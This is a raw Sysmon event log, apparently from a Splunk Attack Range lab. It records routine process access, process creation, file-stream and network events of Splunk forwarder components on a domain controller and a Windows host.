07:43:51.520{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2B7-60EB-E87C-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.520{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B7-60EB-E87C-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.521{466BC892-F2B7-60EB-E87C-00000000CF01}6504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:51.152{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E120EF29D27ACC41B6CE80B4969695FF,SHA256=B86A4C1220CE5A2FCB0B99AF96FDDE371851F0440788D4B0F8CA1BDDAEFDCBCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B8-60EB-EA7C-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F2B8-60EB-EA7C-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.819{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B8-60EB-EA7C-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.805{466BC892-F2B8-60EB-EA7C-00000000CF01}10180C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.588{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F2161C7C582C8CD4621B4B269E6269B,SHA256=AD7B071CFE1FC934C2825CBD5F3819ECF668C487FB0FE668E2511FDAB1391529,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:52.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF596289A5A448B88E86B6810B7E08BC,SHA256=581CE307040E50D6C992FF95DB24C99B5DEED9556E97E75E8D728CD5636F015F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.551{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6CF63A398D3BA3DFA02C909F124B6F2E,SHA256=8A22A386F4EA73A453814B7D9F36A658AD18DF0D3A7ED8335FFBF940A1421E5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.435{466BC892-F2B8-60EB-E97C-00000000CF01}51969456C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B8-60EB-E97C-00000000CF01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F2B8-60EB-E97C-00000000CF01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001045871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.219{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F2B8-60EB-E97C-00000000CF01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001045870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.204{466BC892-F2B8-60EB-E97C-00000000CF01}5196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001045914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.966{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36D08FF44FB089FCACFCDB0BFE42628F,SHA256=4A179C8EDC7E693A10EE1DD0B7B019EBA7B1B8A3A8794692267A1BF270E9B75B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.919{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1D2F5DC555E0D12D657AC4508CC16C2B,SHA256=0351EAC9EE10420132AEA6352E4909FB84CB30DF2EA15899AED3C98B9AAD8382,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.750{466BC892-F2B9-60EB-EB7C-00000000CF01}42285164C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000806029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:51.396{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57151-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:53.075{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD077EE97A721B3FA6E7E15A840FB254,SHA256=2C3B156BB0EA9C54DED0BC9BAF3E14181EEEC4E382C46A4D901114290DBCBC96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F2B9-60EB-EB7C-00000000CF01}4228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:53.487{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001045909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 